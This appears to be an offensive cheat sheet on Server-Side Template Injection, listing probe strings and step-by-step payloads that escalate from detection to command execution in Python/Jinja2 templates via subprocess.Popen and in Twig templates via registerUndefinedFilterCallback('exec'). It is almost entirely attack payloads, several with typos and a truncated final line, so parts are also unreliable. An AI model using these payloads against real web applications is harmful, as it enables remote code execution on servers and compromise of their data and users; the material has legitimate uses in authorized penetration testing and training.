Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection.
#Detecting | Identify reflected user-input.
#Break out of Template statement, inject HTML.
personal_greeting=username}}<tag>
http://URL/page1/{7*7}
URL/test{{4-1}}
{{'7'*7}}
#If python is in use
#Identify Class
{{''.__class__}}
#Iterate [1]
{{''.__class__.mro()[1]}}
#Identify Subclasses. [subprocess.Popen] can be used for code execution.
#Iterate [1]
{{''.__class__.mro()[1]._subclasses__()}}
#Copy to Vi editor. | :set number
{{''.__class__.mro()[1]._subclasses__()[<insert number of class here>]}}
#Get all classes. Iterate [<integer] to get interesting functions.
{{''.__class__.mro()[1].__subclasses__()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}
#Find a function that gives code execution. Get access to <class 'subprocess.Popen'>
#X is the integer you need to find.
{{''.__class__.mro()[1].__subclasses__()[X]}}
#Call this method using:
#X was found previously.
#COMMAND is the command you want to run.
{{''.__class__.mro()[1].__subclasses__()[X](COMMAND)}}
#{{''.__class__.mro()[2].__subclasses__()[233]("uname -a",shell=true)}}
#{{''.__class__.mro()[2].__subclasses__()[233]("uname -a",shell=true,stdout=-1).communicate()[0]}}
Twig
#Check for Twig related errors
{{_self}}
#Check access to twig environment
{{_self.env}}
#Alias to the call user function. This should not reveal any errors
{{_self.env.registerUndefinedFilterCallback('exec')}}
#Get Code execution
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('uname')